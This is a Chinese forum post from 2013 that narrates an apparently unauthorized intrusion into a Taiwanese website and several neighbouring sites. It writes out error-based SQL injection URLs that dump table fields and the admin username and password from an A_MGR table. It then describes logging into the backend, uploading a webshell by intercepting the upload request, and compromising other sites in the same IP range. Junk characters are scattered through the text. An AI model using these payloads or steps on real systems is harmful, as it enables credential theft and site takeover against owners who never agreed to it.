发现一个注入点
) b6 x1 y% i% o9 M- Jhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
9 A+ ~- S) o3 S8 b
( ?6 l1 ^& J2 k习惯性的加’having1=1--. u+ _8 \( m, `- `( w7 q
- ?% t3 ~* w' u$ m. S4 E- F! X1 {% s
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
* Z! s$ q" ^. P4 d, [
- I3 H k# B* w4 {) `0" S% s- ?3 @) [% T2 Q, N
- F7 M: Q3 q. }. E V6 V
爆出Diary_A.dl_Title(这时候很激动啊)
/ a, l! d9 z' C3 u. ~; Z6 y7 y3 b: \4 C; O3 K9 E
那么继续/ f' F+ D( s3 P9 x/ V
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
- F3 P$ |2 |4 i1 \+ J% E- ~- x- C, d* R! z) o
继续,一直爆下去
; }" _; v, u) q" e+ ^) z2 f2 D- p: ^. I7 \
爆到几个字段和表段 但是没找到需要的管理用户的字段
+ W* @, }! b( g" w& Q- k# r, @ G
+ z& e& c) f, y) Q蛋疼了 怎么办 然后去后台登陆页看源码
5 }2 |$ b# k) S; n3 q9 \5 o1 M( q# ?# I: d |! \& U
02 L5 ?& y- i; q u, m
* B: B; |3 y* ]
Input name= “ADUID”# T8 G1 r9 c: {$ I* z- L
Input name= “ADPWD”2 h3 ~# ~' W. p2 g. n, D9 a* s ~9 h
1 A e8 o0 ]9 {( W7 ]8 W很幸运 找到了字段那就继续% ?4 }) \3 W# q8 P8 `
找到之后开始爆用户) X" ?4 ]4 {- t: }' [% s
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—) x5 O6 X }: [; w* v
爆密码: }% {+ J: k$ d/ ~( U) b% f
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
/ @' |5 [; ~0 Q3 f& Q I* a测试了下 这个注入点只能爆到文章哪里的表 J! r3 ?3 N& i, P: U' l
* l( g% y# |/ D头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
5 |6 r9 y9 ~( G9 R$ u3 \4 {
5 l; j1 y1 {6 I9 j' z2 j又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
7 g1 l X1 A' r) {. t. x' r! }3 W0 v% M% L
4732 }+ w# p8 ?7 C: a) c
! g+ d, x1 S1 q3 \( V) c
进后台
3 s* A ]0 l7 r0 J" d1 Z
8 d9 Y0 T+ }; m
# E: n3 e! e N$ ]* S4 R发现几个上传点 有的地方不能上传 而且防止恶意代码0 h$ b4 W+ x. u9 b. K3 M. Q* x: D
4 Y; ^; U/ s4 |& M2 }8 Y: D% z7 X
没办法 各种百度各种找大牛 找到一只好像可以突破的马
% ]5 S" v$ e: w) @7 b' h+ a2 l- z
3 Z+ m% Z3 L8 H6 f9 H在系统管理那里直接上传 不过没有显示地址. Z2 Y) Y9 e$ y4 z' ~
5 b! q$ u# C" o$ z再上传一次 抓包 搞定OK% d+ G- Y4 }2 g3 j4 t
( d9 V! ~$ g& P6 {3 ^2 x `
7 W ~6 W6 k4 i7 N9 R( w
9 W; b$ }+ ]% ]% M( s3 h
472
4 @7 ~) [+ A+ |+ ^/ c' n4 V- N! ]2 S
晚上不行了 去睡觉。。。" y! P( S" M; U0 `; Z6 N
第二天刚起床 闲的没事做继续日站吧 & B8 j/ c9 U- n: r" e( ]
" O& i$ q0 w# I找个站 就把这个站的旁c扫了下2 S' ?4 t9 x Z: q6 r
% d' c, {: @! u# l7 c9 }1 O$ Q; k0 `发现c段也有一个购物站 ,然后还和这个站的模板差不多
3 e7 [3 t) ]/ l$ ~4 n* R% R, L2 N% Z
就找到会员登录口测试
1 p4 k9 b0 H& @( D: z. ]0 h5 U% P- j# `5 F0 }$ R+ z
'and (select top 1 MGR_UID from A_MGR)>0— Z3 ]- [0 E. s9 o- c
果断爆到了 这时候我很激动 通杀
: j5 o1 {( b7 V# e4 S7 R# h6 q2 P: k
再次翻c段2 m. P m; ~; K& e- ~6 h; `
# |# o5 x" R j, e% a' K
翻出几个站 都成功拿下& G3 c' D+ t: G3 u4 n8 Z1 J, @/ a6 [
% L4 m) g. b; x, ~7 @3 z3 a* L' P8 p; u
" y; m( U8 |& [" V% W' S& W& o修复方案:, Z, A) X4 B, R" ^) M$ L
他们比我专业
' O1 N' T& `) n
/ ]0 u. i7 [8 R! A3 |( r5 \: _/ c: \' b! s4 p3 o+ _' J
' |. Q$ K2 t4 j |
发表于 2013-4-4 17:40:38
收藏
支持
反对